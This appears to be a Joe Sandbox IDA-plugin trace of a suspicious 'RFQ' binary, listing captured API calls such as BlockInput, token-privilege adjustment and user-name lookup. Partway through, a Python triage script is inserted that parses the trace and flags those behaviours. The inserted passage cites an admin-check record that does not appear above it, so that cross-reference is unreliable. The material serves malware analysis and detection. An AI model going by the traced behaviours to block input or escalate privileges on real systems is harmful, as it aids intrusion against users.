                                                                            • Instruction Fuzzy Hash: 90F01771A9030DFBDF00DFE4DC89AEEBBBCFB08604F508565E601E2181E778AA449B54
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000003,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002,00000000,?,006B2879,00000003), ref: 006A4C99
                                                                            • TerminateProcess.KERNEL32(00000000,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002,00000000,?,006B2879,00000003), ref: 006A4CA0
                                                                            • ExitProcess.KERNEL32 ref: 006A4CB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 66bcac705a92fca02f0a093f4434274184efa5c9e5dea3f5533e147c3f497ea9
                                                                            • Instruction ID: 09fe3d4a1c6b89211efcd1e4fe19b383978a964e6e04c1954e57dae701794ce9
                                                                            • Opcode Fuzzy Hash: 66bcac705a92fca02f0a093f4434274184efa5c9e5dea3f5533e147c3f497ea9
                                                                            • Instruction Fuzzy Hash: 09E09A71141148ABCB126F98DE09A983B6AEF85355B00C014F95A96262CB79DD41DF84
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 006DDA28
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID: X64
                                                                            • API String ID: 2645101109-893830106
                                                                            • Opcode ID: 991503b15a19c4f231a27c620bc296dfd47ec13aacc69b5575897b9cf7faab27
                                                                            • Instruction ID: b426df0cdfdcfcf8b2242410f70f8089b977857c4725cc7863b8bfdf6d2e7505
                                                                            • Opcode Fuzzy Hash: 991503b15a19c4f231a27c620bc296dfd47ec13aacc69b5575897b9cf7faab27
                                                                            • Instruction Fuzzy Hash: 37D0C9B480511DEACF80CB90EC88DD9777CBB08304F108152F106A2140DB7455498F10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                                            • Instruction ID: 0891d6e196b64e5875912673b1980b5142342f35a4b12a1a93fd81af5d59c195
                                                                            • Opcode Fuzzy Hash: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                                            • Instruction Fuzzy Hash: C6020A71E002199BDF14DFA9C8906ADBBF2EF89324F258169D919A7380D731AE418F94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Variable is not of type 'Object'.$p#u
                                                                            • API String ID: 0-1908159134
                                                                            • Opcode ID: 38eb151cafbb8bc31ebc95b238246397163e3a9cc92af277510d111e4acfd603
                                                                            • Instruction ID: 05259ea0bb41f6fbb125a6ea7120134d6c5e527c2e5a1b4626472921cd58b12f
                                                                            • Opcode Fuzzy Hash: 38eb151cafbb8bc31ebc95b238246397163e3a9cc92af277510d111e4acfd603
                                                                            • Instruction Fuzzy Hash: 21329070D00218EBDF14EF90C994AEDB7B6BF16304F14425AE8066F392D776AE46CB61
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F6836
                                                                            • FindClose.KERNEL32(00000000), ref: 006F687F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 797fd5321d5e77700d049eaf54ceb5f0f37b8070714c0d3027909f9c9db87539
                                                                            • Instruction ID: 1540b4bed076a61460520bae7a87421cdb188eefcdd26ad7e25379d8ecb8b360
                                                                            • Opcode Fuzzy Hash: 797fd5321d5e77700d049eaf54ceb5f0f37b8070714c0d3027909f9c9db87539
                                                                            • Instruction Fuzzy Hash: FF11AF716042009FD710DF69C488A29BBE1BF85324F44C6ADF5258B3A2C734EC05CB91
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007047B8,?,?,00000035,?), ref: 006F3702
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007047B8,?,?,00000035,?), ref: 006F3712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 46f0426728b98b95e46f17ac63282ea088c6683337b4d5acf756b30c8d6f098e
                                                                            • Instruction ID: 6c4d58c27b7d0b0f3038cdbf1ff9ba7a644076d250f695566856dd3585e85ccd
                                                                            • Opcode Fuzzy Hash: 46f0426728b98b95e46f17ac63282ea088c6683337b4d5acf756b30c8d6f098e
                                                                            • Instruction Fuzzy Hash: 60F0E5B02002292AE72066B99C4DFFB7A6FFFC5761F004169F905D22C1DA609D00C7B4
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E1140), ref: 006E1018
                                                                            • CloseHandle.KERNEL32(?,?,006E1140), ref: 006E102D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 969e922eb40c733537cf6ba47ea01c93753d8791d45314fc924c93f8684a96fa
                                                                            • Instruction ID: 0b08f26d5dfd688e47fa7488170fdd8a6d5ab8deada89f243b283225e58959df
                                                                            • Opcode Fuzzy Hash: 969e922eb40c733537cf6ba47ea01c93753d8791d45314fc924c93f8684a96fa
                                                                            • Instruction Fuzzy Hash: 8CE04F32004610EEEB262B55EC05EB277AEEF04310B25C82DF4A5848B1DF626C90DB18
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,006B66F6,00000000,?,00000008,?,?,006BFE9F,00000000), ref: 006B6928
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: a82253ea63e98c0f8b401371684890d93e866b778af6f1731c6ad32cf6b4d6c5
                                                                            • Instruction ID: 2a379b12ee0e1b337242b5d1cc9a887196c2d51e87a4ff80187199af8fb36d54
                                                                            • Opcode Fuzzy Hash: a82253ea63e98c0f8b401371684890d93e866b778af6f1731c6ad32cf6b4d6c5
                                                                            • Instruction Fuzzy Hash: EFB14C715106099FD715CF28C48ABE47BE2FF45364F258658F899CF2A2C739E992CB40
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 006FE9E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: 221ae0e7a5d6c756d774e6d1001673e7e42a373556c0050e876a0e60728d97eb
                                                                            • Instruction ID: acc74d192fc508d813f5e098939b0425d282b5332f6d747411fa997cb589da33
                                                                            • Opcode Fuzzy Hash: 221ae0e7a5d6c756d774e6d1001673e7e42a373556c0050e876a0e60728d97eb
                                                                            • Instruction Fuzzy Hash: 8CE0DF312002049FC340AF69C845EAABBEDBF94760F00C01AFA09D7360CAB1EC018BB1
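The three records above (the AllocateAndInitializeSid/CheckTokenMembership/FreeSid function, the AdjustTokenPrivileges/CloseHandle function, and the BlockInput function) are the ones a triager most wants pulled out of a report of this size. The following Python script is an added example, not Joe Sandbox code and not part of the original report: it parses the report's own "APIs" / "API ID" line format and tags those three patterns. The SAMPLE_REPORT text is constructed from the call lines on this page, trimmed to the lines the parser needs; the function names, tag strings and the regular expressions are the example's own choices. The SID sub-authorities 0x20 and 0x220 in the AllocateAndInitializeSid arguments are SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS, i.e. S-1-5-32-544 (BUILTIN\Administrators), which is what makes the first record an administrator-membership check.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: "APIs" call lines and "API ID" keys of four records,
# copied from this page and trimmed. Hashes and dump sources are left out
# because the parser ignores them anyway.
SAMPLE_REPORT = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 006E15D0
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006E15E5
• FreeSid.ADVAPI32(?), ref: 006E15F5
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E1140), ref: 006E1018
• CloseHandle.KERNEL32(?,?,006E1140), ref: 006E102D
• API ID: AdjustCloseHandlePrivilegesToken
APIs
• BlockInput.USER32(00000001), ref: 006FE9E4
• API ID: BlockInput
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 006DDA28
Strings
• API ID: NameUser
"""

# One "• Api.MODULE(args), ref: ADDR" line. The report also prints calls with
# no argument list (e.g. "ExitProcess.KERNEL32 ref: 006A4CB2"), so the
# parenthesised part is optional.
CALL_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
APIID_RE = re.compile(r"^•\s*API ID:\s*(?P<id>\S*)$")

# Sub-authorities of S-1-5-32-544 (BUILTIN\Administrators) as the report
# prints them: SECURITY_BUILTIN_DOMAIN_RID = 0x20, DOMAIN_ALIAS_RID_ADMINS = 0x220.
BUILTIN_ADMINS_RIDS: Tuple[str, str] = ("00000020", "00000220")


def parse_records(text: str) -> List[Dict]:
    """Split report text into records of the form {'api_id': str, 'calls': [...]}.

    A record starts at an "APIs" header and collects every call line and the
    "API ID" similarity key that follow it, up to the next "APIs" header.
    """
    records: List[Dict] = []
    current: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"api_id": "", "calls": []}
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = m.group("args")
            current["calls"].append({
                "api": m.group("api"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"),
            })
            continue
        m = APIID_RE.match(line)
        if m:
            current["api_id"] = m.group("id")
    return records


def flag_records(records: List[Dict]) -> List[Tuple[str, str]]:
    """Return (ref, tag) pairs for records that match the patterns of interest.

    Only the first call of each API name in a record is consulted; that is
    enough for records as small as the ones in this report.
    """
    findings: List[Tuple[str, str]] = []
    for rec in records:
        by_name: Dict[str, Dict] = {}
        for call in rec["calls"]:
            by_name.setdefault(call["api"], call)

        # BUILTIN\Administrators membership test: a two-sub-authority SID
        # (0x20, 0x220) built in the same function that calls CheckTokenMembership.
        sid = by_name.get("AllocateAndInitializeSid")
        if (sid and "CheckTokenMembership" in by_name
                and len(sid["args"]) >= 4
                and sid["args"][1] == "00000002"
                and tuple(sid["args"][2:4]) == BUILTIN_ADMINS_RIDS):
            findings.append((sid["ref"], "admin-membership-check"))

        # Privilege adjustment on an access token; which privilege is enabled
        # is not visible in the recorded arguments.
        adj = by_name.get("AdjustTokenPrivileges")
        if adj:
            findings.append((adj["ref"], "token-privilege-adjust"))

        # BlockInput(TRUE): keyboard and mouse input blocked for the session.
        bi = by_name.get("BlockInput")
        if bi and bi["args"][:1] == ["00000001"]:
            findings.append((bi["ref"], "input-block-enabled"))
    return findings


if __name__ == "__main__":
    for ref, tag in flag_records(parse_records(SAMPLE_REPORT)):
        print(f"{ref}: {tag}")
```

Arguments the sandbox could not recover statically are printed as "?" in the report, so rules should key on the constant arguments (the SID sub-authorities, the BlockInput flag) rather than on pointers. The GetUserNameW record parses but is deliberately not tagged: on its own it is ordinary reconnaissance, and the interesting signal in this report is the combination of the admin check, the privilege adjustment and the input blocking inside one binary.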
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 006EE29C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: 853914f08e5ed2675b4d6f3a056cfa65b18560c377f0e5cc53c030853b8b4f11
                                                                            • Instruction ID: bee1eebad29bc563d8c8c6854de39e13e299b7fd0db5064bc8099cd3ead171bf
                                                                            • Opcode Fuzzy Hash: 853914f08e5ed2675b4d6f3a056cfa65b18560c377f0e5cc53c030853b8b4f11
                                                                            • Instruction Fuzzy Hash: CAD05EB21923807CE89D0E7F9E2FFB63B0FE301701F54A24DB201C9795E5D7AA415425
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020961,006A036E), ref: 006A095A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00702A57
                                                                            • DeleteObject.GDI32(00000000), ref: 00702A6A
                                                                            • DestroyWindow.USER32 ref: 00702A79
                                                                            • GetDesktopWindow.USER32 ref: 00702A94
                                                                            • GetWindowRect.USER32(00000000), ref: 00702A9B
                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00702BCA
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00702BD8
                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702C1F
                                                                            • GetClientRect.USER32(00000000,?), ref: 00702C2B
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00702C67
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702C89
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702C9C
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CA7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00702CB0
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CBF
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00702CC8
                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CCF
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00702CDA
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CEC
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0071FC54,00000000), ref: 00702D02
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00702D12
                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00702D38
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00702D57
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702D79
                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702F66
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
